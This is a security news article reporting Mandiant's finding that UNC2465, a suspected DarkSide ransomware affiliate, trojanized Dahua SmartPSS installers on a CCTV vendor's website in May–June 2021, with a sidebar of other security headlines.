17 June 2021

DarkSide affiliates shift to software supply chain attacks


DarkSide affiliates shift to software supply chain attacks

A hacker group, believed to be one of the affiliates of the DarkSide ransomware group, targeted at least one victim via malicious software installer downloaded from a legitimate website, Mandiant revealed.

Tracked as UNC2465, the group has compromised the website of a CCTV camera vendor and planted malware in the Dahua SmartPSS Windows app, a software to manage security surveillance devices, that the company provided to its customers. The CCTV camera vendor’s website was breached on May 18, and the intrusion lasted until early June when the malware was detected, Mandiant said.

According to the researchers, UNC2465 likely trojanized two software install packages on a CCTV security camera provider website and gained access to potential victims through an unsuspecting user in the affected organization who accessed the malicious link and downloaded the ZIP file.

“Upon installing the software, a chain of downloads and scripts were executed, leading to SMOKEDHAM and later NGROK on the victim’s computer. Additional malware use such as BEACON, and lateral movement also occurred. Mandiant believes the Trojanized software was available from May 18, 2021, through June 8, 2021,” Mandiant explained.

The security firm linked the breach of the CCTV vendor’s official website to UNC2465 based on the use of SMOKEDHAM, a backdoor trojan that previously was observed only in the UNC2465 attacks.

While the ransomware was not involved in this case, Mandiant believes that “affiliate groups that have conducted DarkSide intrusions may use multiple ransomware affiliate programs and can switch between them at will.”

“Ransomware groups continue to adapt and pursue opportunistic access to victims. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection,” the company said.

“While many organizations are now focusing more on perimeter defenses and two-factor authentication after recent public examples of password reuse or VPN appliance exploitation, monitoring on endpoints is often overlooked or left to traditional antivirus. A well-rounded security program is essential to mitigate risk from sophisticated groups such as UNC2465 as they continue to adapt to a changing security landscape.”


Back to the list

Latest Posts

Malicious actors target Kubernetes clusters via Argo Workflows

Malicious actors target Kubernetes clusters via Argo Workflows

In the observed attacks the threat actors deployed a popular cryptocurrency mining container, kannix/monero-miner.
26 July 2021
Kaseya obtains a decryptor for victims of the REvil ransomware attack

Kaseya obtains a decryptor for victims of the REvil ransomware attack

It's not clear, if the company paid any ransom.
23 July 2021
Chinese cyber-spies use hacked routers in attacks against French organizations

Chinese cyber-spies use hacked routers in attacks against French organizations

The hackers are hijacking home routers to build a proxy botnet in order to hide the origins of their attacks.
22 July 2021